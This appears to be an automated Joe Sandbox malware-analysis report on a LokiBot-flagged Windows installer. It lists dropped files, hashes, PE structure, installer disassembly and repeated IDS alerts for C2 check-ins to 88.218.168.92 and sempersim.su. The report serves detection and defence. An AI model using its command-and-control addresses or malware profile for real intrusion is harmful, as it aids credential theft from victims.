                  http://www.ibsensoftware.com/dehbibhar.exe, dehbibhar.exe, 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dehbibhar.exe, 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  88.218.168.92
                  sempersim.suRussian Federation
                  208861RACKTECHRUtrue
                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:620372
                  Start date and time: 04/05/202217:04:192022-05-04 17:04:19 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 54s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:dhGoVvfmul (renamed file extension from none to exe)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:23
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@5/6@45/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 98.5% (good quality ratio 95%)
                  • Quality average: 79.4%
                  • Quality standard deviation: 27.5%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • HTTP Packets have been reduced
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 40.125.122.176, 20.54.89.106, 20.223.24.244
                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  17:05:49API Interceptor41x Sleep call for process: dehbibhar.exe modified
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Users\user\Desktop\dhGoVvfmul.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):4.0668271918538625
                  Encrypted:false
                  SSDEEP:48:qDXboBaPMMlGIB2hnhY+q12GKgG5CeDb+X949gvRuqS:+XEoMme6MzVROthJx
                  MD5:99DF91CF3E9775BE40FE27FEFA10C203
                  SHA1:DBDA94E51F0F783E4C169D2D838D3377550450AC
                  SHA-256:A2FC8B5DDF220B7D9DF0E7FCC88F2EBA533698F3D178AF97A93788B614C64014
                  SHA-512:D7ABD84314DCDCFEB42F230F901A7B5DA49EAD7D1F85F1AF34CC55D5A69278F1A7BF39BF08E92B22E81F50A8E0370705C709E550F1DE794095313DEBD2BA7F2D
                  Malicious:true
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 46%, Browse
                  • Antivirus: ReversingLabs, Detection: 24%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.......................Q...........-...........<............Rich............PE..L.....ob..................................... ....@..........................@...............................................!.......0............................... ............................................... ...............................text...^........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\dhGoVvfmul.exe
                  File Type:DOS executable (COM, 0x8C-variant)
                  Category:dropped
                  Size (bytes):4935
                  Entropy (8bit):6.158373046672494
                  Encrypted:false
                  SSDEEP:96:Fp8h7t+r4zx4jrGP0VqcfWKcirH1BAbK6S6DWZlBy9FWGPZNQB2jK4CsBDL1:+tA4zx4jywfTOXUBKQ4XCstL1
                  MD5:E2FFABC730A2CF170A16934F49E1B05E
                  SHA1:09299351820381199C6CEE30062DFC5BE0A3E9A6
                  SHA-256:07A69D2284B659076040725425497D4DA10ADB891A5F3D54A10C707D2A74FB01
                  SHA-512:CFD2709345EE7D1DE087A3D46CF418F96EE347C1A37579608B84BD00747FCECC2D148A65CF7C879837DCEC9E58F3EE2D2C2D31B534B9E4174F2A57C17C99BF14
                  Malicious:false
                  Reputation:low
                  Preview:........&.....&.....c.....c....&...j....&.........0.....,.{,........0.....,.s,.w......0..t...,.k,.o......0.._...,.c,.g& ........c...<,.,....&...l,.,......0.d.u.........0.e,...,..&........&..n.....{...s...k....c..........(..........,..&......{.....,........j.....&..n..........le.........c....................d..d.,..,........,......le.....i"..........e......"..........e.....>"......e.....&...c....j....0.{,.& ......i.....,....,.....(c....<....l.,.{,...0.<...d..,.{,.........c.0.{.....".n....u...,..0.......,.& ....&.....j......le.....&...c....j....0.c,.& ......i.....,....,...<...(c.'-.....<....l.,.c,..g..<...d..,.c,..g..<...t.,.c,..g...l....u.,.c,.g0.<...d..,.c,..g......c.0.c....i".........,.& ........,......................,.& ....&.....j......le.....&..j....0.,.& ......i.....,....,...E...(c....<....l.,.,.....<...d..,.,.........c.0.....>"........,.........Z..
                  Process:C:\Users\user\Desktop\dhGoVvfmul.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):106495
                  Entropy (8bit):7.955489709110049
                  Encrypted:false
                  SSDEEP:1536:hYYUu04hEOBzupNyyKiYjPFvrNHzNwZWOzLqJW0bvivVEPq80H46I:hYYVhEO+AFvlSkOzuJDudEy/H+
                  MD5:92B8F8D79D15063FE55F13D98069FD80
                  SHA1:46EA07994665E3560A6FE9B38483D47B8527B6DD
                  SHA-256:92336A96341D13C5B45A82EE508A85EAE3C907DDF9E2C62DD99F5DB2CA59D9CE
                  SHA-512:96B1E4FEB23DA9B0711BCEB637CF3DE80C9F62592BD673E4A83E20F5DBD15F225D40FE0D9624B0ED029EA1AFA46C167E03C7CEDE27BCBF7D51B146481450267C
                  Malicious:false
                  Reputation:low
                  Preview:.G.......H.CV.+.......IzLq...n.Aj..............}.f.`.;......>.....$.B2y.6K..D.....#...l.y..M....'O.....sE.......;;b....L.<.#w...r..>.[#~.cT.<....E.y.[.......iL..(....0]..8&k...et..5.h9e@D.i[....A.G..>..(........g.W.V.......k....x...A........h(...:..{..C.p>.h.....Ih....n.A.a......:.........`.;.B.l.y>.....$.9... ....I....r.#.t.u........: ..Cu..o">cf.....F.L.<.#wBm.6..i.h...*.G..z.d....#5M7.o.9V].y,.....0.....a>....!.'.p...n......e.....d5k.|..[P......5.>.....<m.'.x..........Qh....:.*...6H.C.+H..l....IJvq...j.Ai..............}.f...;....z.>....$.@... ...G..... .#.tx.........: .aCu..."..7...J.F.L.<.#wBm.6..i.h...*.G..z.d....#5M7.o.9V].y,.....0.....a>....!.'.p...n............d5k.|..[P......5.>.....k....x..#A..B....Qh(...:.*...6H.C..+.h.....I.Lq...n.Aj..............}.f.`.;.....y>......$.9... ......... .#.tx.u........: ..Cu..o".k7.....F.L.<.#wBm.6..i.h...*.G..z.d....#5M7.o.9V].y,.....0.....a>....!.'.p...n............d5k.|..[P......5.>....
                  Process:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):4.0668271918538625
                  Encrypted:false
                  SSDEEP:48:qDXboBaPMMlGIB2hnhY+q12GKgG5CeDb+X949gvRuqS:+XEoMme6MzVROthJx
                  MD5:99DF91CF3E9775BE40FE27FEFA10C203
                  SHA1:DBDA94E51F0F783E4C169D2D838D3377550450AC
                  SHA-256:A2FC8B5DDF220B7D9DF0E7FCC88F2EBA533698F3D178AF97A93788B614C64014
                  SHA-512:D7ABD84314DCDCFEB42F230F901A7B5DA49EAD7D1F85F1AF34CC55D5A69278F1A7BF39BF08E92B22E81F50A8E0370705C709E550F1DE794095313DEBD2BA7F2D
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 24%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.......................Q...........-...........<............Rich............PE..L.....ob..................................... ....@..........................@...............................................!.......0............................... ............................................... ...............................text...^........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview:1
                  Process:C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbq:4
                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                  Malicious:false
                  Preview:........................................user.
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.733849688630961
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:dhGoVvfmul.exe
                  File size:125839
                  MD5:5c5d4e3e0dadff03da7b9878acf3e706
                  SHA1:38a387d18c147245078db39a82f8531816c9d726
                  SHA256:bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596
                  SHA512:073194f0f86af4ca4721b3d7ea7e78755b90e1c8e85e27c969f0407a4ab78bf0af153177e96e583d952c9dacb6cc7b7a0071eabc80ff015b5f209a9b668ff2c4
                  SSDEEP:3072:l1NjcVVnLpPunbxOP+E6zXX3BeTZpqiJ5OboPYtfyr/cDA:HNeZmE29oT5bRYlyr/z
                  TLSH:96C3029C66A0C0B3C9F247322A361377DEF6952266668B0F03604F9C7D66781EE0D776
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....
                  Icon Hash:b2a88c96b2ca6a72
                  Entrypoint:0x4034f7
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 000003F4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [ebp-14h], ebx
                  mov dword ptr [ebp-04h], 0040A2E0h
                  mov dword ptr [ebp-10h], ebx
                  call dword ptr [004080CCh]
                  mov esi, dword ptr [004080D0h]
                  lea eax, dword ptr [ebp-00000140h]
                  push eax
                  mov dword ptr [ebp-0000012Ch], ebx
                  mov dword ptr [ebp-2Ch], ebx
                  mov dword ptr [ebp-28h], ebx
                  mov dword ptr [ebp-00000140h], 0000011Ch
                  call esi
                  test eax, eax
                  jne 00007EFCA8D2EB2Ah
                  lea eax, dword ptr [ebp-00000140h]
                  mov dword ptr [ebp-00000140h], 00000114h
                  push eax
                  call esi
                  mov ax, word ptr [ebp-0000012Ch]
                  mov ecx, dword ptr [ebp-00000112h]
                  sub ax, 00000053h
                  add ecx, FFFFFFD0h
                  neg ax
                  sbb eax, eax
                  mov byte ptr [ebp-26h], 00000004h
                  not eax
                  and eax, ecx
                  mov word ptr [ebp-2Ch], ax
                  cmp dword ptr [ebp-0000013Ch], 0Ah
                  jnc 00007EFCA8D2EAFAh
                  and word ptr [ebp-00000132h], 0000h
                  mov eax, dword ptr [ebp-00000134h]
                  movzx ecx, byte ptr [ebp-00000138h]
                  mov dword ptr [0042A2D8h], eax
                  xor eax, eax
                  mov ah, byte ptr [ebp-0000013Ch]
                  movzx eax, ax
                  or eax, ecx
                  xor ecx, ecx
                  mov ch, byte ptr [ebp-2Ch]
                  movzx ecx, cx
                  shl eax, 10h
                  or eax, ecx
                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xa50.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x65150x6600False0.661534926471data6.43970794855IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x80000x139a0x1400False0.45data5.14577456407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xa0000x203380x600False0.499348958333data4.01369865045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x3b0000xa500xc00False0.402018229167data4.18462166815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x3b1900x2e8dataEnglishUnited States
                  RT_DIALOG0x3b4780x100dataEnglishUnited States
                  RT_DIALOG0x3b5780x11cdataEnglishUnited States
                  RT_DIALOG0x3b6980x60dataEnglishUnited States
                  RT_GROUP_ICON0x3b6f80x14dataEnglishUnited States
                  RT_MANIFEST0x3b7100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                  DLLImport
                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  05/04/22-17:06:31.292534 05/04/22-17:06:31.292534TCP2825766ETPRO TROJAN LokiBot Checkin M24978780192.168.2.488.218.168.92
                  05/04/22-17:06:16.374113 05/04/22-17:06:16.374113TCP2025483ET TROJAN LokiBot Fake 404 Response804978088.218.168.92192.168.2.4
                  05/04/22-17:06:18.169397 05/04/22-17:06:18.169397TCP2825766ETPRO TROJAN LokiBot Checkin M24978180192.168.2.488.218.168.92
                  05/04/22-17:07:15.237173 05/04/22-17:07:15.237173TCP2825766ETPRO TROJAN LokiBot Checkin M24981080192.168.2.488.218.168.92
                  05/04/22-17:06:22.890812 05/04/22-17:06:22.890812TCP2825766ETPRO TROJAN LokiBot Checkin M24978480192.168.2.488.218.168.92
                  05/04/22-17:07:26.375874 05/04/22-17:07:26.375874UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5178753192.168.2.48.8.8.8
                  05/04/22-17:06:09.089375 05/04/22-17:06:09.089375UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5759453192.168.2.48.8.8.8
                  05/04/22-17:06:10.670601 05/04/22-17:06:10.670601UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6051253192.168.2.48.8.8.8
                  05/04/22-17:06:46.460576 05/04/22-17:06:46.460576TCP2025483ET TROJAN LokiBot Fake 404 Response804979388.218.168.92192.168.2.4
                  05/04/22-17:07:04.571093 05/04/22-17:07:04.571093TCP2825766ETPRO TROJAN LokiBot Checkin M24980180192.168.2.488.218.168.92
                  05/04/22-17:05:51.935858 05/04/22-17:05:51.935858TCP2825766ETPRO TROJAN LokiBot Checkin M24976280192.168.2.488.218.168.92
                  05/04/22-17:07:24.436443 05/04/22-17:07:24.436443TCP2825766ETPRO TROJAN LokiBot Checkin M24981480192.168.2.488.218.168.92
                  05/04/22-17:07:32.534838 05/04/22-17:07:32.534838UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6079053192.168.2.48.8.8.8
                  05/04/22-17:07:18.160224 05/04/22-17:07:18.160224TCP2825766ETPRO TROJAN LokiBot Checkin M24981280192.168.2.488.218.168.92
                  05/04/22-17:06:03.575681 05/04/22-17:06:03.575681TCP2825766ETPRO TROJAN LokiBot Checkin M24977180192.168.2.488.218.168.92
                  05/04/22-17:07:24.858929 05/04/22-17:07:24.858929TCP2025483ET TROJAN LokiBot Fake 404 Response804981488.218.168.92192.168.2.4
                  05/04/22-17:07:21.051803 05/04/22-17:07:21.051803TCP2025483ET TROJAN LokiBot Fake 404 Response804981388.218.168.92192.168.2.4
                  05/04/22-17:07:26.425495 05/04/22-17:07:26.425495TCP2825766ETPRO TROJAN LokiBot Checkin M24981580192.168.2.488.218.168.92
                  05/04/22-17:06:11.460186 05/04/22-17:06:11.460186TCP2025483ET TROJAN LokiBot Fake 404 Response804977888.218.168.92192.168.2.4
                  05/04/22-17:05:46.967263 05/04/22-17:05:46.967263TCP2825766ETPRO TROJAN LokiBot Checkin M24975980192.168.2.488.218.168.92
                  05/04/22-17:06:15.851899 05/04/22-17:06:15.851899UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5044553192.168.2.48.8.8.8
                  05/04/22-17:07:34.959527 05/04/22-17:07:34.959527TCP2825766ETPRO TROJAN LokiBot Checkin M24981980192.168.2.488.218.168.92
                  05/04/22-17:05:50.222185 05/04/22-17:05:50.222185TCP2825766ETPRO TROJAN LokiBot Checkin M24976180192.168.2.488.218.168.92
                  05/04/22-17:06:36.675434 05/04/22-17:06:36.675434TCP2025483ET TROJAN LokiBot Fake 404 Response804979088.218.168.92192.168.2.4
                  05/04/22-17:07:15.612334 05/04/22-17:07:15.612334TCP2025483ET TROJAN LokiBot Fake 404 Response804981088.218.168.92192.168.2.4
                  05/04/22-17:07:18.596983 05/04/22-17:07:18.596983TCP2025483ET TROJAN LokiBot Fake 404 Response804981288.218.168.92192.168.2.4
                  05/04/22-17:07:36.027149 05/04/22-17:07:36.027149UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6094653192.168.2.48.8.8.8
                  05/04/22-17:06:19.592402 05/04/22-17:06:19.592402TCP2825766ETPRO TROJAN LokiBot Checkin M24978280192.168.2.488.218.168.92
                  05/04/22-17:05:58.351855 05/04/22-17:05:58.351855UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6490953192.168.2.48.8.8.8
                  05/04/22-17:07:05.007163 05/04/22-17:07:05.007163TCP2025483ET TROJAN LokiBot Fake 404 Response804980188.218.168.92192.168.2.4
                  05/04/22-17:05:56.623177 05/04/22-17:05:56.623177TCP2825766ETPRO TROJAN LokiBot Checkin M24976580192.168.2.488.218.168.92
                  05/04/22-17:06:31.742972 05/04/22-17:06:31.742972TCP2025483ET TROJAN LokiBot Fake 404 Response804978788.218.168.92192.168.2.4
                  05/04/22-17:06:40.198897 05/04/22-17:06:40.198897TCP2825766ETPRO TROJAN LokiBot Checkin M24979280192.168.2.488.218.168.92
                  05/04/22-17:05:58.579153 05/04/22-17:05:58.579153TCP2825766ETPRO TROJAN LokiBot Checkin M24976780192.168.2.488.218.168.92
                  05/04/22-17:07:18.109794 05/04/22-17:07:18.109794UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6106853192.168.2.48.8.8.8
                  05/04/22-17:05:53.764676 05/04/22-17:05:53.764676UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6075853192.168.2.48.8.8.8
                  05/04/22-17:06:34.682087 05/04/22-17:06:34.682087UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5398953192.168.2.48.8.8.8
                  05/04/22-17:05:57.102046 05/04/22-17:05:57.102046TCP2025483ET TROJAN LokiBot Fake 404 Response804976588.218.168.92192.168.2.4
                  05/04/22-17:06:21.587324 05/04/22-17:06:21.587324TCP2025483ET TROJAN LokiBot Fake 404 Response804978388.218.168.92192.168.2.4
                  05/04/22-17:07:00.547757 05/04/22-17:07:00.547757TCP2025483ET TROJAN LokiBot Fake 404 Response804980088.218.168.92192.168.2.4
                  05/04/22-17:06:19.530815 05/04/22-17:06:19.530815UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5247253192.168.2.48.8.8.8
                  05/04/22-17:06:46.019049 05/04/22-17:06:46.019049TCP2825766ETPRO TROJAN LokiBot Checkin M24979380192.168.2.488.218.168.92
                  05/04/22-17:06:54.136918 05/04/22-17:06:54.136918UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5077853192.168.2.48.8.8.8
                  05/04/22-17:06:13.754758 05/04/22-17:06:13.754758TCP2025483ET TROJAN LokiBot Fake 404 Response804977988.218.168.92192.168.2.4
                  05/04/22-17:05:53.814873 05/04/22-17:05:53.814873TCP2825766ETPRO TROJAN LokiBot Checkin M24976480192.168.2.488.218.168.92
                  05/04/22-17:05:56.551066 05/04/22-17:05:56.551066UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6064753192.168.2.48.8.8.8
                  05/04/22-17:06:58.254969 05/04/22-17:06:58.254969TCP2025483ET TROJAN LokiBot Fake 404 Response804979988.218.168.92192.168.2.4
                  05/04/22-17:06:03.517854 05/04/22-17:06:03.517854UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5406953192.168.2.48.8.8.8
                  05/04/22-17:06:29.614717 05/04/22-17:06:29.614717TCP2025483ET TROJAN LokiBot Fake 404 Response804978688.218.168.92192.168.2.4
                  05/04/22-17:07:32.582866 05/04/22-17:07:32.582866TCP2825766ETPRO TROJAN LokiBot Checkin M24981880192.168.2.488.218.168.92
                  05/04/22-17:06:29.050171 05/04/22-17:06:29.050171UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5881653192.168.2.48.8.8.8
                  05/04/22-17:06:51.541781 05/04/22-17:06:51.541781TCP2025483ET TROJAN LokiBot Fake 404 Response804979788.218.168.92192.168.2.4
                  05/04/22-17:06:18.577427 05/04/22-17:06:18.577427TCP2025483ET TROJAN LokiBot Fake 404 Response804978188.218.168.92192.168.2.4
                  05/04/22-17:06:01.883215 05/04/22-17:06:01.883215TCP2025483ET TROJAN LokiBot Fake 404 Response804976988.218.168.92192.168.2.4
                  05/04/22-17:05:43.139332 05/04/22-17:05:43.139332TCP2825766ETPRO TROJAN LokiBot Checkin M24975880192.168.2.488.218.168.92
                  05/04/22-17:07:20.576478 05/04/22-17:07:20.576478UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5871553192.168.2.48.8.8.8
                  05/04/22-17:06:47.446849 05/04/22-17:06:47.446849UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6108153192.168.2.48.8.8.8
                  05/04/22-17:06:27.621610 05/04/22-17:06:27.621610TCP2025483ET TROJAN LokiBot Fake 404 Response804978588.218.168.92192.168.2.4
                  05/04/22-17:06:38.277875 05/04/22-17:06:38.277875TCP2825766ETPRO TROJAN LokiBot Checkin M24979180192.168.2.488.218.168.92
                  05/04/22-17:07:29.254760 05/04/22-17:07:29.254760TCP2825766ETPRO TROJAN LokiBot Checkin M24981680192.168.2.488.218.168.92
                  05/04/22-17:07:08.472306 05/04/22-17:07:08.472306UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6494853192.168.2.48.8.8.8
                  05/04/22-17:06:09.618553 05/04/22-17:06:09.618553TCP2025483ET TROJAN LokiBot Fake 404 Response804977788.218.168.92192.168.2.4
                  05/04/22-17:07:06.183458 05/04/22-17:07:06.183458TCP2825766ETPRO TROJAN LokiBot Checkin M24980280192.168.2.488.218.168.92
                  05/04/22-17:06:23.295314 05/04/22-17:06:23.295314TCP2025483ET TROJAN LokiBot Fake 404 Response804978488.218.168.92192.168.2.4
